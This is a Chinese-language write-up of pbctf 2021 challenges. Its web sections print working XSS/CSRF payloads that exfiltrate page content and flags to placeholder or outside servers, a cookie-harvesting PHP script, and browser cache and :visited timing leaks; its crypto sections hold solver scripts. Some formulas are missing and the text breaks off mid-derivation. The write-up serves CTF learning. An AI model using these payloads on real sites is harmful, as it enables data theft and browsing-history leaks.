pbctf 2021 WriteUps

這次久違的 Solo 用 nyahello 隊伍的名義參加了 pbctf 2021,crypto 部分只剩一題沒解,而 web 解了兩題再加 misc 的水題之後有第 15 名。果然第一名的 Perfect Blue 出的題目真的不簡單。

  排行榜截圖

題目名稱上有 * 的題目代表是我賽後才解的。

Web

TBDXSS

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
from flask import Flask, request, session, jsonify, Response
import json
import redis
import random
import os
import time

app = Flask(__name__)
app.secret_key = os.environ.get("SECRET_KEY", "tops3cr3t")

app.config.update(
SESSION_COOKIE_SECURE=True,
SESSION_COOKIE_HTTPONLY=True,
SESSION_COOKIE_SAMESITE='Lax',
)

HOST = os.environ.get("CHALL_HOST", "localhost:5000")

r = redis.Redis(host='redis')

@app.after_request
def add_XFrame(response):
response.headers['X-Frame-Options'] = "DENY"
return response


@app.route('/change_note', methods=['POST'])
def add():
session['note'] = request.form['data']
session.modified = True
return "Changed succesfully"

@app.route("/do_report", methods=['POST'])
def do_report():
cur_time = time.time()
ip = request.headers.get('X-Forwarded-For').split(",")[-2].strip() #amazing google load balancer

last_time = r.get('time.'+ip)
last_time = float(last_time) if last_time is not None else 0

time_diff = cur_time - last_time

if time_diff > 6:
r.rpush('submissions', request.form['url'])
r.setex('time.'+ip, 60, cur_time)
return "submitted"

return "rate limited"

@app.route('/note')
def notes():
print(session)
return """
<body>
{}
</body>
""".format(session['note'])

@app.route("/report", methods=['GET'])
def report():
return """
<head>
<title>Notes app</title>
</head>
<body>
<h3><a href="/note">Get Note</a>&nbsp;&nbsp;&nbsp;<a href="/">Change Note</a>&nbsp;&nbsp;&nbsp;<a href="/report">Report Link</a></h3>
<hr>
<h3>Please report suspicious URLs to admin</h3>
<form action="/do_report" id="reportform" method=POST>
URL: <input type="text" name="url" placeholder="URL">
<br>
<input type="submit" value="submit">
</form>
<br>
</body>
"""

@app.route('/')
def index():
return """
<head>
<title>Notes app</title>
</head>
<body>
<h3><a href="/note">Get Note</a>&nbsp;&nbsp;&nbsp;<a href="/">Change Note</a>&nbsp;&nbsp;&nbsp;<a href="/report">Report Link</a></h3>
<hr>
<h3> Add a note </h3>
<form action="/change_note" id="noteform" method=POST>
<textarea rows="10" cols="100" name="data" form="noteform" placeholder="Note's content"></textarea>
<br>
<input type="submit" value="submit">
</form>
<br>
</body>
"""

以上是這題核心部分的 code,而目標的 XSS bot 在 visit 的時候會預先帶有一個 session,其內容是 flag,所以在 visit /note 的時候會直接顯示出 flag。然後這題可以很簡單的用 CSRF 去 POST /change_note 達成 XSS,但是因為在 session 中的 flag 被蓋掉了所以 XSS 也沒用。

讓我想到解法的是它用 response.headers['X-Frame-Options'] = "DENY" 禁止 iframe 的那行的意義是什麼,想了一下就想到可以在自己的頁面上用兩個 iframe,一個先載入好 /note 之中的 flag 之後用另一個 iframe 去觸發 XSS,之後可以從 XSS 的那個 iframe 中用 top.frames 去存取有 flag 的那個 iframe 中的內容即可。

這題雖然禁止了 iframe,但是其實 window.open 也有類似的效果,只要先在 _blank 中打開之後 window.open 所回傳的就會是新分頁的 window object。而被打開的那個新分頁中也可以用 window.opener 去存取原先呼叫那個 window.open 的那個 tab 的 window,這樣就一樣能利用類似的方法去做到前面所述的事。

只是這次沒有 frames 能用,怎麼能讓它們取得恰當的 window object 呢? 我的作法是先讓一個頁面上 open 兩個 tab,一個是 CSRF 去 XSS 用的,另一個是會 delay 一下再去 open /note 觸發 XSS 用的,而原先的那個頁面就直接 location.href 轉到 /note。這樣你就能在 XSS 的那個 tab 上面的 window.opener 的這個 chain 上找到有 flag 的那個 window 了,這樣即可拿到 flag。

index.php:

因為 XSS bot 只載入到 load event 就會停止,所以要把它卡住,然後在新分頁中的 main.php 才是我真正的 payload

1
2
3
4
<script>
open(location.href + 'main.php', '_blank')
</script>
<img src="https://deelay.me/20000/https://example.com">

main.php:

這就是所謂的那個主頁面,開啟兩個 tab 之後馬上 redirect 到有 flag 的 /note

1
2
3
4
5
<script>
open(location.href.replace('main', 'submit'), '_blank')
open(location.href.replace('main', 'opennote'), '_blank')
location.href = 'https://tbdxss.chal.perfect.blue/note'
</script>

submit.php:

很標準的 CSRF

1
2
3
4
5
6
7
<form action="https://tbdxss.chal.perfect.blue/change_note" method="POST" id=f>
<input name="data" value="peko">
</form>
<script>
f.data.value = '<script>const report = t => fetch("https://YOUR_SERVER/xss.php", {method: "POST", body: t}); report(window.opener.opener.document.body.textContent)</'+'script>'
f.submit()
</script>

opennote.php:

delay 之後在新分頁中開啟有 XSS 的 /note,因為是在新分頁的緣故所以 XSS 的地方需要使用 window.opener.opener 才能存取到原先 redirect 到 /notemain.php

1
<script>setTimeout(() => { open('https://tbdxss.chal.perfect.blue/note', '_blank') }, 1000)</script>

Flag: pbctf{g1t_m3_4_p4g3_r3f3r3nc3}

Vault

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
#!/usr/bin/env python3

import os
import socket


from flask import Flask
from flask import render_template
from flask import request

from flask_caching import Cache
from flask_recaptcha import ReCaptcha

app = Flask(__name__)
app.config["RECAPTCHA_SITE_KEY"] = os.environ["RECAPTCHA_SITE_KEY"]
app.config["RECAPTCHA_SECRET_KEY"] = os.environ["RECAPTCHA_SECRET_KEY"]
recaptcha = ReCaptcha(app)

cache = Cache(config={'CACHE_TYPE': 'FileSystemCache', 'CACHE_DIR':'/tmp/vault', 'CACHE_DEFAULT_TIMEOUT': 300})
cache.init_app(app)

@app.route("/<path:vault_key>", methods=["GET", "POST"])
def vault(vault_key):
parts = list(filter(lambda s: s.isdigit(), vault_key.split("/")))
level = len(parts)
if level > 15:
return "Too deep", 422

if not cache.get("vault"):
cache.set("vault", {})

main_vault = cache.get("vault")

c = main_vault
for v in parts:
c = c.setdefault(v, {})

values = c.setdefault("values", [])

if level > 8 and request.method == "POST":
value = request.form.get("value")
value = value[0:50]
values.append(value)

cache.set("vault", main_vault)
return render_template("vault.html", values = values, level = level)

@app.route("/", methods=["GET", "POST"])
def main():
if request.method == "GET":
return render_template("main.html")
else:
if recaptcha.verify():
url = request.form.get("url")
if not url:
return "The url parameter is required", 422
if not url.startswith("https://") and not url.startswith("http://"):
return "The url parameter is invalid", 422


s = socket.create_connection(("bot", 8000))
s.sendall(url.encode())
resp = s.recv(100)
s.close()

return resp.decode(), 200
else:
return "Invalid captcha", 422

上面是這個題目核心部分的 code,主要有個 /12/24/8/31/.../ 的 path 可以讓你寫入內容到裡面去,沒有 XSS。然後它有個 bot 會先瀏覽這個網站 (http://vault.chal.perfect.blue/),然後隨機點擊十四層進到一個有十四層深的 path 中,然後在那個頁面上 submit flag 之後 visit 到你指定的任意網站:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
async function click_vault(page, i) {
const vault = `a.vault-${i}`;
const elem = await page.waitForSelector(vault, { visible: true });
await Promise.all([page.waitForNavigation(), elem.click()]);
}

async function add_flag_to_vault(browser, url) {
if (!url || url.indexOf("http") !== 0) {
return;
}
const page = await browser.newPage();

try {
await page.goto(vaultUrl);

for (let i = 0; i < 14; i++) {
await click_vault(page, crypto.randomInt(1, 33));
}
await page.type("#value", FLAG);
await Promise.all([page.waitForNavigation(), page.click("#submit")]);

await page.goto(url);
await new Promise((resolve) => setTimeout(resolve, 30 * 1000));
} catch (e) {
console.log(e);
}
await page.close();
}

這個題目的目標是要想辦法取得 bot 在瀏覽你的頁面之前最後所在的那個頁面的 url,然後就能獲得 flag 了。作法顯然是和 XS-LeaksCache Probing 有關,就是利用瀏覽器的 cache 去查詢一個 url 有沒有被 visit 過。最簡單的方法就是用 await fetch(url, { 'cache': 'force-cache' }) 然後計算它所經過的時間就可以判斷出有沒有 cache 過。

如果你試著在自己的頁面上測試會發現這樣沒有效果,但是在 chal.perfect.blue domain 之下的頁面卻可以成功,這個是因為現在的瀏覽器一般都有 Cache Partitioning 去把 cache 依照你的來源 origin 分開,這樣也能避免利用 cache 去查找你瀏覽過的 url 和 tracking 的問題。

我的作法是利用前一題 TBDXSS 的 domain 是 tbdxss.chal.perfect.blue 的這個事實,可以知道它和這題的 vault.chal.perfect.blue 使用的是同個 cache,用 fetch 測試也是有預期中的結果,所以只要在上面 XSS 去 Cache Probing 應該就能通過了。

不過一個困難點在於 TBDXSS 的 cookie 因為 SESSION_COOKIE_SECURE=True 的緣故所以都是 secure 的,代表只能在 https 下面作用,但是這題 bot 的 cache 是在 http://vault.chal.perfect.blue/ 底下,如果在一個 https 的頁面上存取 http 會被瀏覽器擋下來,然後收到 Mixed Content 的 warning。

後來我注意到如果在 https 的頁面上用 document.cookie = 'session=xxxx; path=/note' 之後去瀏覽 http://tbdxss.chal.perfect.blue/note,可以看到 cookie 一樣會被發送出去,這樣就能達成我們的目標。至於 xxxx 的部份也容易取得,只要向 TBDXSS 的 server POST 你的 payload 之後就能取得對應的 cookie 即 xxxx 的值了。

index.html:

開啟兩個頁面,一個是 CSRF 去 submit XSS payload 到 TBDXSS,另一個是 delay 之後開啟 TBDXSS 的 /note 頁面觸發 XSS

1
2
3
4
5
6
<body>
<script>
open(location.href + 'submit.php', '_blank')
open(location.href + 'opennote.php', '_blank')
</script>
</body>

opennote.php:

和前一題一樣

1
<script>setTimeout(() => { open('https://tbdxss.chal.perfect.blue/note', '_blank') }, 1000)</script>

submit.php:

xss.js 讀檔之後 POST 過去取得對應的 session cookie,然後生成一個設定 document.cookie 的 XSS payload,之後 redirect 到 http 版本的頁面之後在上面執行 xss.js 中真正的第二重 XSS

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<?php
$xss = file_get_contents('xss.js');
$payload = '<script>'.$xss.'</script>';
$ch = curl_init('https://tbdxss.chal.perfect.blue/change_note');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
'data' => $payload
]));
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);


function onHeader( $curl, $header_line ) {
global $sess;
if(strpos($header_line, 'session=') !== false){
$sess = explode(';', explode('session=', $header_line)[1])[0];
}
return strlen($header_line);
}

curl_setopt($ch, CURLOPT_HEADERFUNCTION, "onHeader");
$response = curl_exec($ch);

$js = 'document.cookie = "session=" + '.json_encode($sess).'+ "; path=/note"; location.href = "http://tbdxss.chal.perfect.blue/note";';
?>
<form action="https://tbdxss.chal.perfect.blue/change_note" method="POST" id=f>
<textarea name="data"></textarea>
</form>
<script>
f.data.value = "SET COOKIE<script>" + <?= json_encode($js) ?> + "</" + "script>"
f.submit()
</script>

xss.js:

這部分是真正的 Cache Probing 的 code,發現到 cache 過的頁面所要的 fetch 時間都小於 5ms,所以直接這樣遞迴爆破找 path 即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
const report = s => fetch(location.protocol + '//YOUR_SERVER/report.php', { method: 'POST', body: s })
const getLoadTime = async url => {
const start = performance.now()
await fetch(url, { cache: 'force-cache', mode: 'no-cors' })
return performance.now() - start
}
const buildUrl = parts => location.protocol + '//vault.chal.perfect.blue/' + parts.join('/') + '/'
window.onload = async () => {
try {
for (let i = 0; i < 5; i++) {
// warmup
await getLoadTime(location.protocol + '//vault.chal.perfect.blue/')
}
const brute = async parts => {
for (let i = 1; i <= 32; i++) {
const t = await getLoadTime(buildUrl(parts.concat([i])))
if (t < 5) {
const nextParts = parts.concat([i])
report(buildUrl(nextParts))
return brute(nextParts)
}
}
}
await brute([])
} catch (e) {
report(e.toString())
}
}
report('sancheck: ' + location.href)

最後會發現因為一些未知的緣故,它只能找到 14-1=13 層的 path,但是這個很容易解決,寫個 python 腳本把最後一層爆破出來即可:

1
2
3
4
5
6
7
8
9
10
11
import requests

url = "http://vault.chal.perfect.blue/11/30/24/5/30/3/4/2/30/7/16/32/9/"

for i in range(1, 33):
r = requests.get(f"{url}{i}/")
if "pbctf" in r.text:
print(f"{url}{i}/", r.text)

# http://vault.chal.perfect.blue/11/30/24/5/30/3/4/2/30/7/16/32/9/26/
# pbctf{who_knew_that_history_was_not_so_private}

這個腳本中的 url 不一定會 work,因為聽說它們後來加上了多個 instance,所以可能會在其它的 instance 上面

Intended Solution

不過我這個做法似乎算是 unintended,預期解是利用 :visited 去 leak 一個 link 有沒有被 visie 過的樣子。

作者的 solution 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
<!DOCTYPE html>
<html>

<!--
Visited links are known to be leaky, see

https://bugs.chromium.org/p/chromium/issues/detail?id=713521
https://bugs.chromium.org/p/chromium/issues/detail?id=1247907

Can use requestAnimationFrame and requestIdleCallback to reliably check when a links :visited status changes

-->
<head>
<style>
#link {
position: absolute;
top: 0;
opacity: 0.001;
pointer-events: none;
}

a {
display: block;
}

.container {
display: grid;
grid-template-columns: 1fr 1fr;
}

.links {
width: 30vw;
}
</style>
</head>

<body>
<a id="link" href=""></a>

<div class="container">
<div class="links">
<h2>Visited links</h2>
<hr>
<div id="seen"></div>
</div>
<div class="links">
<h2>Unvisted links</h2>
<hr>
<div id="unseen"></div>
</div>
</div>

<script>
// const VAULT_URL = "http://localhost:5000/";
const VAULT_URL = "http://web:5000/";

const link = document.getElementById("link");
const seen = document.getElementById("seen");
const unseen = document.getElementById("unseen");

async function getLinkTime(url) {
let t1, t2 = 0;
await new Promise((resolve) => {
requestAnimationFrame(() => {
t1 = performance.now();
link.href = url;
requestIdleCallback(() => {
t2 = performance.now()
resolve();
}, { timeout: 1000 });
});
});
return t2 - t1;
}

async function hasLinkBeenVisited(url) {
await getLinkTime("");
const urlTime = await getLinkTime(url);
const urlTimeUnvisited = await getLinkTime(url + "?" + performance.now())
return urlTimeUnvisited > urlTime;
}

async function checkUrl(url) {
const a = document.createElement("a");
a.href = url;
a.innerText = url;

if (await hasLinkBeenVisited(url)) {
seen.prepend(a);
return true;
} else {
unseen.prepend(a);
return false;
}
}

async function setup() {
link.innerText = "aa ".repeat(0x10000);

let base = VAULT_URL;

while (true) {
let found = false;
const urls = [];
for (let i = 0; i < 33; i++) {
urls.push(`${base}${i}/`)
}
urls.push("http://adsfadsfadf.com");
for (const url of urls) {
if (await checkUrl(url)) {
base = url;
found = true;
break;
}
}
if (!found) {
break;
}
}

await fetch("http://aw.rs?" + base)
}
setup()
</script>
</body>

</html>

瀏覽器中有沒瀏覽過的 link 和有瀏覽過的 link 有不同的顏色,例如在 Chromium 中預設分別是藍色和紫色。所以理論上如果能取得顏色應該就能判斷一個人是否有瀏覽過某個 url,而 getComputedStyle 也確實能讓你存取一個 element 的顏色。

不過,在它的文件中也有說明,為了隱私的緣故,它不會讓你分辨出 :visited 之後的顏色,所以一律只回傳沒有瀏覽過的顏色。

而作者的 solution 的方法可以看到它有個 a#link,位置是固定的,然後用 opacity 讓它近乎透明。之後在最一開始的時候對它插入一大堆字元 ("aa ".repeat(0x10000))。

此時如果你改變了 href,瀏覽器也會更新 :visited 的狀態,如果顏色有改變就代表要重新 renderer,因為有大量的文字所以它需要花上較多的時間才能重新 render 好。所以只要能存取瀏覽器重新 render 所需的時間就能 leak 出一些資訊。

在我的電腦上使用 Chrome 94 進行測試,那個 a#link 不改顏色 vs 改顏色的時間差別大概是 0.1 vs 3~5ms

getLinkTime 裡面先使用了 requestAnimationFrame,這個函數會在瀏覽器 repaint 之前呼叫,它在 callback 裡面記錄下了時間 t1 以及更新 href,然後再用 requestIdleCallback 註冊另一個 callback。當另一個 callback 被呼叫的時候就 resolve(performance.now() - t1),這個時間差所代表的就是瀏覽器為了處裡這個 href 的更新所花的時間。

可能還會加上點處裡其他東西的時間,但是可做為微小誤差忽略不計

hasLinkBeenVisited 中一開始先用 getLinkTime("")href 設定為空字串,然後確保它 render 完之後再繼續執行。這是為了確保 link 的顏色是紫色(和 :visited 相同)。之後先 getLinkTime 目標的 url 得到 urlTime,再用 getLinkTime 在另一個確保不會有 :visited 的 url 得到另一個時間 urlTimeUnvisited

如果 url 是 :visited 的,那麼它顏色的變化將會是 紫->紫->藍,反之則是 紫->藍->藍。我們知道顏色變化所需的時間會遠大於不變化所需的時間,所以若是 urlTime < urlTimeUnvisited 就代表 url 是 :visited 的。

利用這個時間差就能爆破出目標的 path 出來,然後得到 flag 了。

我後來還有自己在 Firefox 做做看這個實驗,第一個困難點在於 Firefox 預設 performance.now() 的精度只有 ms 級別,所以很難有更加精準的時間。另一個是 Firefox 中的 getLinkTime 因為一些未知的原因似乎沒辦法像 Chromium 那麼精準的得到 href 改變所需的時間。最後自己多加了一些 code 也只能讓它高機率正確取得 path 中的第一個數字而已,第二個數字之後就會失敗。

Crypto

Alkaloid Stream

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#!/usr/bin/env python3

import random
from flag import flag

def keygen(ln):
# Generate a linearly independent key
arr = [ 1 << i for i in range(ln) ]

for i in range(ln):
for j in range(i):
if random.getrandbits(1):
arr[j] ^= arr[i]
for i in range(ln):
for j in range(i):
if random.getrandbits(1):
arr[ln - 1 - j] ^= arr[ln - 1 - i]

return arr

def gen_keystream(key):
ln = len(key)

# Generate some fake values based on the given key...
fake = [0] * ln
for i in range(ln):
for j in range(ln // 3):
if i + j + 1 >= ln:
break
fake[i] ^= key[i + j + 1]

# Generate the keystream
res = []
for i in range(ln):
t = random.getrandbits(1)
if t:
res.append((t, [fake[i], key[i]]))
else:
res.append((t, [key[i], fake[i]]))

# Shuffle!
random.shuffle(res)

keystream = [v[0] for v in res]
public = [v[1] for v in res]
return keystream, public

def xor(a, b):
return [x ^ y for x, y in zip(a, b)]

def recover_keystream(key, public):
st = set(key)
keystream = []
for v0, v1 in public:
if v0 in st:
keystream.append(0)
elif v1 in st:
keystream.append(1)
else:
assert False, "Failed to recover the keystream"
return keystream

def bytes_to_bits(inp):
res = []
for v in inp:
res.extend(list(map(int, format(v, '08b'))))
return res

def bits_to_bytes(inp):
res = []
for i in range(0, len(inp), 8):
res.append(int(''.join(map(str, inp[i:i+8])), 2))
return bytes(res)

flag = bytes_to_bits(flag)

key = keygen(len(flag))
keystream, public = gen_keystream(key)
assert keystream == recover_keystream(key, public)
enc = bits_to_bytes(xor(flag, keystream))

print(enc.hex())
print(public)

可以看到它先把 flag 轉換成 bits,然後生成同等長度的線性獨立的 key。之後利用 key 去生成一些 fake 的值,之後隨機生成 keystream 和 flag xor 加密。而 public 是根據每個 keystream 的 bit,調換 keyfake 的順序所生成的,所以要還原 keystream 需要找個方法能在沒有 key 的情況下去分出 keyfake 的差別。

可以先把 key 換成最基本的 1,2,4,...,512 來觀察看看:

1
2
['0000000001', '0000000010', '0000000100', '0000001000', '0000010000', '0000100000', '0001000000', '0010000000', '0100000000', '1000000000']
['0000001110', '0000011100', '0000111000', '0001110000', '0011100000', '0111000000', '1110000000', '1100000000', '1000000000', '0000000000']

上面的 list 是 key 的二進位,然後下面的 list 是對應的 fake 的二進位,可以觀察出每個 fake 都是後 k 個 key 的 xor,如果剩下的 key 不到 k 個的話就不管它,所以 fake[-1] == 0 永遠成立。 (其中 k = len(key) // 3)

因為根據它 key 的生成方法我們知道 key 中不會有 0,所以有 0 的話肯定是 fake 的,這樣就能得出一個 key 的值。接下來有有一個 key 之後又能用類似的方法找到另一個 fake 的值,這樣又能恢復第二個 key,這樣用一樣的方法反覆下去就能恢復所有的 key 了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
import ast
from functools import reduce
from operator import xor

with open("output.txt") as f:
ct = bytes.fromhex(f.readline().strip())
public = ast.literal_eval(f.readline().strip())

window = len(public) // 3
print(window)
PT = list(zip(*public)) # transpose
rkey = []

fakei = -1
xk = 0 # the last element of fake is always 0

while len(rkey) != len(public):
if xk in PT[0] and PT[0].index(xk) != fakei:
ROW = False
else:
ROW = True
fakei = PT[ROW].index(xk)
k = PT[not ROW][fakei]
rkey.append(k)
print(fakei)
xk = reduce(xor, rkey[-window:])

key = rkey[::-1]


def recover_keystream(key, public):
st = set(key)
keystream = []
for v0, v1 in public:
if v0 in st:
keystream.append(0)
elif v1 in st:
keystream.append(1)
else:
assert False, "Failed to recover the keystream"
return keystream


def bits_to_bytes(inp):
res = []
for i in range(0, len(inp), 8):
res.append(int("".join(map(str, inp[i : i + 8])), 2))
return bytes(res)


ks = recover_keystream(key, public)
print(bytes(a ^ b for a, b in zip(ct, bits_to_bytes(ks))))

# pbctf{super_duper_easy_brute_forcing_actually_this_one_was_made_by_mistake}

前面說的 k 在這個 code 裡面叫 window

Steroid Stream

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
#!/usr/bin/env python3

import random
from flag import flag

def keygen(ln):
# Generate a linearly independent key
arr = [ 1 << i for i in range(ln) ]

for i in range(ln):
for j in range(i):
if random.getrandbits(1):
arr[j] ^= arr[i]
for i in range(ln):
for j in range(i):
if random.getrandbits(1):
arr[ln - 1 - j] ^= arr[ln - 1 - i]

return arr

def gen_keystream(key):
ln = len(key)
assert ln > 50

# Generate some fake values based on the given key...
fake = [0] * ln
for i in range(ln - ln // 3):
arr = list(range(i + 1, ln))
random.shuffle(arr)
for j in arr[:ln // 3]:
fake[i] ^= key[j]

# Generate the keystream
res = []
for i in range(ln):
t = random.getrandbits(1)
if t:
res.append((t, [fake[i], key[i]]))
else:
res.append((t, [key[i], fake[i]]))

# Shuffle!
random.shuffle(res)

keystream = [v[0] for v in res]
public = [v[1] for v in res]
return keystream, public

def xor(a, b):
return [x ^ y for x, y in zip(a, b)]

def recover_keystream(key, public):
st = set(key)
keystream = []
for v0, v1 in public:
if v0 in st:
keystream.append(0)
elif v1 in st:
keystream.append(1)
else:
assert False, "Failed to recover the keystream"
return keystream

def bytes_to_bits(inp):
res = []
for v in inp:
res.extend(list(map(int, format(v, '08b'))))
return res

def bits_to_bytes(inp):
res = []
for i in range(0, len(inp), 8):
res.append(int(''.join(map(str, inp[i:i+8])), 2))
return bytes(res)

flag = bytes_to_bits(flag)

key = keygen(len(flag))
keystream, public = gen_keystream(key)
assert keystream == recover_keystream(key, public)
enc = bits_to_bytes(xor(flag, keystream))

print(enc.hex())
print(public)

這題和前一題很像,但是在生成 fake 的地方修改了一下,它讓 k = len(public) // 3fake 都固定為 0,但是剩下的所有 fake 都會是 k 個 key 的 xor。

xor 這件是可以表示為 中的加法,更多的 bits 也只是 的向量加法而已。 (n = len(public))

首先利用 k 個 fake 都是 0 的這件事可以讓我們得到三分之一的 key。根據 fake 的生成方法,剩下未知的 fake 之中起碼有一個是目前已知的 key 中的 k 個 key 的線性組合。這部分可以用 sage 的 solve_left 去解然後 check 看看解答中的向量的 1 的數量是否和 k 相等。

用這個方法就能實作出 solution 了,不過實際上跑起來要花上不少時間,在我的電腦上它花了約一個小時才跑出來:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
import ast
from sage.all import GF, vector, matrix, ZZ
from tqdm import tqdm

with open("output.txt") as f:
ct = bytes.fromhex(f.readline().strip())
public = ast.literal_eval(f.readline().strip())

window = len(public) // 3
print(window)
PT = list(zip(*public)) # transpose
l = len(public)


def findpt(cond):
for i in range(l):
if cond(PT[0][i]):
yield 0, i
elif cond(PT[1][i]):
yield 1, i


def bink(x, k):
return bin(x)[2:].rjust(k, "0")


F = GF(2)


def int2vec(x, bits=len(public)):
v = vector(F, map(int, bink(x, bits)))
v.set_immutable()
return v


def vec2int(v):
return int("".join(map(str, v)), 2)


def is_in_span(M, t, k):
try:
r = M.solve_left(t)
return sum(r.change_ring(ZZ)) == k
except ValueError:
return False


rkey = set()
for r, i in findpt(lambda x: x == 0):
rkey.add(int2vec(PT[not r][i]))

pbar = tqdm(total=len(public))
pbar.n = len(rkey)
pbar.refresh()
while len(rkey) != len(public):
M = matrix(rkey)

def check(x):
return is_in_span(M, int2vec(x), window)

for r, i in findpt(check):
rkey.add(int2vec(PT[not r][i]))
pbar.n = len(rkey)
pbar.refresh()
print(len(rkey))

rkey = set(vec2int(v) for v in rkey)

key = list(rkey)


def recover_keystream(key, public):
st = set(key)
keystream = []
for v0, v1 in public:
if v0 in st:
keystream.append(0)
elif v1 in st:
keystream.append(1)
else:
assert False, "Failed to recover the keystream"
return keystream


def bits_to_bytes(inp):
res = []
for i in range(0, len(inp), 8):
res.append(int("".join(map(str, inp[i : i + 8])), 2))
return bytes(res)


ks = recover_keystream(key, public)
print(bytes(a ^ b for a, b in zip(ct, bits_to_bytes(ks))))

# takes ~1hr to run...
# pbctf{I_hope_you_enjoyed_this_challenge_now_how_about_playing_Metroid_Dread?}

不過 intended solution 的算法似乎比我這個好多了,速度也會比較快。和這個有關但是我看不懂 :(

GoodHash

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
#!/usr/bin/env python3

from Crypto.Cipher import AES
from Crypto.Util.number import *
from flag import flag
import json
import os
import string

ACCEPTABLE = string.ascii_letters + string.digits + string.punctuation + " "


class GoodHash:
def __init__(self, v=b""):
self.key = b"goodhashGOODHASH"
self.buf = v

def update(self, v):
self.buf += v

def digest(self):
cipher = AES.new(self.key, AES.MODE_GCM, nonce=self.buf)
enc, tag = cipher.encrypt_and_digest(b"\0" * 32)
return enc + tag

def hexdigest(self):
return self.digest().hex()


if __name__ == "__main__":
token = json.dumps({"token": os.urandom(16).hex(), "admin": False})
token_hash = GoodHash(token.encode()).hexdigest()
print(f"Body: {token}")
print(f"Hash: {token_hash}")

inp = input("> ")
if len(inp) > 64 or any(v not in ACCEPTABLE for v in inp):
print("Invalid input :(")
exit(0)

inp_hash = GoodHash(inp.encode()).hexdigest()

if token_hash == inp_hash:
try:
token = json.loads(inp)
if token["admin"] == True:
print("Wow, how did you find a collision?")
print(f"Here's the flag: {flag}")
else:
print("Nice try.")
print("Now you need to set the admin value to True")
except:
print("Invalid input :(")
else:
print("Invalid input :(")

這題題目生成一個固定的 json,然後使用一個自訂的 GoodHash 函數算雜湊,之後你得提供一個擁有相同 hash 的另一個 json,它在 parse 完之後有 admin: true 才行。

這個 GoodHash 函數很簡單,它把你的 hash data 作為 AES-GCM 的 nonce 輸入,而 key 是固定已知的,加密全部都是 0 的兩個 block 之後的輸出作為 hash output。

pycryptodome 中 GCM 的實作可以看到這個:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# Step 2 - Compute J0
if len(self.nonce) == 12:
j0 = self.nonce + b"\x00\x00\x00\x01"
else:
fill = (16 - (len(nonce) % 16)) % 16 + 8
ghash_in = (self.nonce +
b'\x00' * fill +
long_to_bytes(8 * len(nonce), 8))

j0 = _GHASH(hash_subkey, ghash_c).update(ghash_in).digest()

# Step 3 - Prepare GCTR cipher for encryption/decryption
nonce_ctr = j0[:12]
iv_ctr = (bytes_to_long(j0) + 1) & 0xFFFFFFFF

這邊的 j0 才是真正作為 GCM 的 counter 的 IV,所以只要兩個 nonce 出來的 j0 相同就能有整個 GoodHash 的 collision,這樣目標就變成了 GHASH 這個函數的 collision。

pycryptodome 的 GCM 實作是參考這篇的,在裡面的 6.4 節有 GHASH 函數的 pseudo code。這個函數用 的運算表達起來非常簡單:

其中 是一個定值,對應到的是前面的 hash_subkey,而 是你的輸入的 blocks,即 ghash_in,也就是 padded 過的 nonce。前面的 hash_subkey 則是使用 AES-ECB 和相同的 key 去加密一個 block 的 0 得到的。

單純只是要 collision 的話很簡單,假設今天有一個固定的 message 有 hash ,想找一個 也擁有相同的 hash:

所以有 ,取 就能找到其中一個 collision 了。

